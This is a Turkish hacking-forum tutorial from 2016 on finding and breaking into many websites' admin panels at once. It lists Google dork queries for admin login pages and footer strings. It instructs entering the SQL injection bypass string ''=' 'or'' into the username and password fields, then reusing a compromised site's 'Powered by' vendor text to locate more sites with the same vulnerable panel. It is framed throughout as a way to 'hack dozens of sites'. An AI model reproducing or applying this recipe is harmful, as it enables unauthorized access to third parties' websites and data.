- 7 Mar 2016
- 470
- 5
Merhaba arkadaşlar;
Bu konumda kendi yöntemlerimce sql injection bypass'ı etkili kullanmayı öğreneceğiz.
Başlamadan önce sql injection bypass hakkında bilgisi olmayan arkadaşlar 'Gonzales Hocamın konusunu inceleyebilirler.
Kod:
[SIZE="3"][COLOR="White"][B]
[URL="https://www.turkhackteam.org/web-server-guvenligi/1342579-bypass-dork-yazma-site-hackleme-gonzales.html"]https://www.turkhackteam.org/web-server-guvenligi/1342579-bypass-dork-yazma-site-hackleme-gonzales.html[/URL]
[/B][/COLOR][/SIZE]
Hemen öğrenmeye başlayalım
En çok kullanılan dorkları arattığımızda açıklı site çıksa dahi genellikle hacklenmiş olur.
Kod:
[SIZE="3"][COLOR="White"][B]
inurl:/admin.php
inurl:/admin/login.php
inurl:/administrator/login.php
[/B][/COLOR][/SIZE]
Lakin bizim aradığımız dork sadece farklı olmakla kalmayıp aynı zamanda bize onlarca site hackletebilmeli. Birde hepsinin admin paneli aynı olsa, hiç yabancılık çekmesek fena olmazdı değil mi Sahi böyle bir dork olabilir mi ?
Kod:
[SIZE="3"][COLOR="White"][B]
intext:"Powered By"
intext:"Created By"
intext:"Edited By"
[/B][/COLOR][/SIZE]
Kesinlikle olabilir. Bu dorkları birlikte arattığımızda çıkan sitelerdeki admin panellerinin user ve password kısımlarına '=' 'or' bypass kodunu girelim.
Kod:
[SIZE="3"][COLOR="White"][B]
inurl:/admin.php intext:"Powered By"
inurl:/admin/login.php intext:"Powered By"
inurl:/administrator/login.php intext:"Powered By"
[/B][/COLOR][/SIZE]
Olurda sql bypass kodumuz işe yarar ve admin paneline sızabilirsek hemen panel giriş sayfasına geri dönelim. Bizim için buraraki Powered By yazısının tamamı daha önemli. Bu yazıyı tekrardan intext komutuyla Google'da aratalım.
Kod:
[SIZE="3"][COLOR="White"][B]
intext:"Powered by Infotech Systems"
[/B][/COLOR][/SIZE]
Örnek olması amacıyla dorkumuzu Google'da arattığımızda yaklaşık olarak 3 sayfa kadar site düştü. Tek tek tüm sitelere admin panelimizin yolunu gösterip tekrardan '=' 'or' bypass kodumuzu girelim.
Kod:
[SIZE="3"][COLOR="White"][B]
www.hedefsite.com/admin-panel/login.php
[/B][/COLOR][/SIZE]
Bu yöntem her site için çalışacak değil. Lakin çok daha kısa sürede çok daha fazla siteye ulaşmanıza olanak sağlar.
Arkadaşlar bugünlük benden bu kadar Elinizden geldiğince basit olarak bile gördüğünüz bir şeyi daima farklı kılmaya çalışın. Emin olun ki bu hayatta tabiri caizse farklı olan kazanır. Tüm TurkHackTeam ailesine Selam olsun. Vesselam..
[ame]https://www.youtube.com/watch?v=-J4Xe6Y0i8I[/ame]